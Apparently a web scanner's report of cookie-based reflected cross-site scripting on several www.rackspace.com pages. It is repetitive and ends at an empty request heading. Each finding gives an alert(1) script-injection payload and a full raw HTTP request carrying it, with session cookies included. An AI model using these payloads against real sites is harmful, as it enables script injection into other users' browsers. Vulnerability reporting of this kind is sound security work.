The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c5e"%3balert(1)//f167e473e26 was submitted in the IS_UASrackuid cookie. This input was echoed as 36c5e";alert(1)//f167e473e26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_solutions.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f836c5e"%3balert(1)//f167e473e26; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd4c0"><script>alert(1)</script>330ba7b1d9a was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_solutions.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8dd4c0"><script>alert(1)</script>330ba7b1d9a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b6e"%3balert(1)//1ea4afdbc5a was submitted in the chatslider cookie. This input was echoed as b6b6e";alert(1)//1ea4afdbc5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hosting_solutions.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Db6b6e"%3balert(1)//1ea4afdbc5a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43fa2"><script>alert(1)</script>8f4111d94ca was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /hosting_solutions.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D43fa2"><script>alert(1)</script>8f4111d94ca; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee42"><script>alert(1)</script>6c3ae622e6e was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php?noflash=true HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83ee42"><script>alert(1)</script>6c3ae622e6e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14ff2"%3balert(1)//de5d634a2e2 was submitted in the IS_UASrackuid cookie. This input was echoed as 14ff2";alert(1)//de5d634a2e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.php?noflash=true HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f814ff2"%3balert(1)//de5d634a2e2; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71319"%3balert(1)//31550deb95d was submitted in the chatslider cookie. This input was echoed as 71319";alert(1)//31550deb95d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.php?noflash=true HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D71319"%3balert(1)//31550deb95d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ee9d"><script>alert(1)</script>7a20dc89626 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php?noflash=true HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2ee9d"><script>alert(1)</script>7a20dc89626; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f584"%3balert(1)//a86a143833d was submitted in the IS_UASrackuid cookie. This input was echoed as 4f584";alert(1)//a86a143833d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/aboutus.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84f584"%3balert(1)//a86a143833d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bb1d"><script>alert(1)</script>f8c7e4a0e53 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/aboutus.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84bb1d"><script>alert(1)</script>f8c7e4a0e53; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2a1c"%3balert(1)//051ba40c348 was submitted in the chatslider cookie. This input was echoed as a2a1c";alert(1)//051ba40c348 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/aboutus.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Da2a1c"%3balert(1)//051ba40c348; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19634"><script>alert(1)</script>e58abcce2fa was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/aboutus.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D19634"><script>alert(1)</script>e58abcce2fa; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5015"%3balert(1)//3eb3a6c915b was submitted in the IS_UASrackuid cookie. This input was echoed as d5015";alert(1)//3eb3a6c915b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/contactus.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d5015"%3balert(1)//3eb3a6c915b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c34"><script>alert(1)</script>aed8f9fc615 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
